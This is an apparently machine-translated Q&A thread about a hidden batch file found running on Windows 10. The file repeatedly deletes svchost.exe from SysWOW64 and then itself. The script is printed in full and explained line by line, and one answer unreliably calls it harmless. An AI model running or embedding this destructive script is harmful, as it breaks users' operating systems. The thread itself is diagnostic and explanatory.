昨天,我发现我的 SysWOW64 文件夹中正在运行以下批处理文件:
@Echo Off
cd /d C:\Windows\SysWOW64\
:Start
del svchost.exe
If Exist svchost.exe Goto Start
del %0
我打开任务管理器时发现了它,因为我的电池快要没电了。我不知道它是怎么开始运行的,因为它没有计划任务,没有服务,没有启动等,而且它运行时没有可见的窗口(只有cmd.exe)
不幸的是,我匆忙中将它杀死了,因为它的资源已经耗尽,所以我没有捕捉到参数,这本来可以帮助我更好地理解这一点。以前有人遇到过这种情况吗?我尝试通过病毒总数,声称它是完全安全的。或者这只是一个恶作剧?
PS 运行 Windows 10,已完全更新。Malwarebytes 没有检测到任何东西。
编辑:进一步的研究让我发现了一种 DDos 恶意软件徐欢,但我没有得到注册表项和其他文件提到我的 McAffe,以及没有防火墙提示explorer.exe
编辑 2:Virustotal 现在充满了正面报告,所以我想这不再是问题!
答案1
不管怎样,Malwarebytes 现在将其检测为 Trojan.Agent.Trace(他们的通用名称“这很讨厌,但我们不知道它来自哪种病毒”)。我在我的系统上发现了它,我的系统是一台有线台式机。我一个人住。我不知道它是怎么到那里的,所以这一切都很令人不寒而栗。
这让我想起了 90 年代的经典病毒。它们的目的不是封存您的信用卡信息或利用您的计算机进行挖矿,它们只是想破坏您的 Windows 安装。
答案2
让我们一次看完一行。
@Echo Off
批处理脚本的命令在运行时不会打印到控制台。
cd /d C:\Windows\SysWOW64\
脚本将导航到C:\驱动器上的 SysWOW64 文件夹。如果当前驱动器不同,则/d开关会使脚本将其更改为当前驱动器。C:\
:Start
这是后面会提到的标签。
del svchost.exe
如果svchost.exe当前目录中存在,请将其删除。这不会将其发送到回收站;除非您幸运地使用文件恢复软件,否则它将永远消失。请注意,这将删除svchost.exe在 64 位系统上运行的用于 32 位服务的可执行文件。svchost.exe也驻留在您的System32文件夹中,在 64 位系统上用于 64 位服务(而在 32 位系统上,它用于 32 位服务)。
If Exist svchost.exe Goto Start
如果 svchost.exe 由于某种原因仍然存在,该脚本将循环回到:Start之前定义的标签,然后尝试del svchost.exe再次运行,直到被删除。
del %0
一旦svchost.exe删除,If 语句将不会循环回到标签,而是运行此语句。通常,这会让脚本删除自己的文件,但是根据此评论在 SO 答案上这将不起作用,因为当前路径会改变?
如果您重视您的操作系统,我就不会运行它。
至于它会耗尽你的电池,如果它不能删除svchost.exe(缺少高度,文件正在使用?),我可以想象它会无休止地运行。在这种情况下,脚本每秒会尝试删除文件数百次甚至数千次;我可以想象它会破坏你的硬盘,耗尽你的 CPU(感谢 Sampo 的纠正!),从而耗尽你的电池。
答案3
该文件不是病毒。它仅删除“svchost.exe”文件,如果该文件仍然存在,则尝试执行任务(删除)。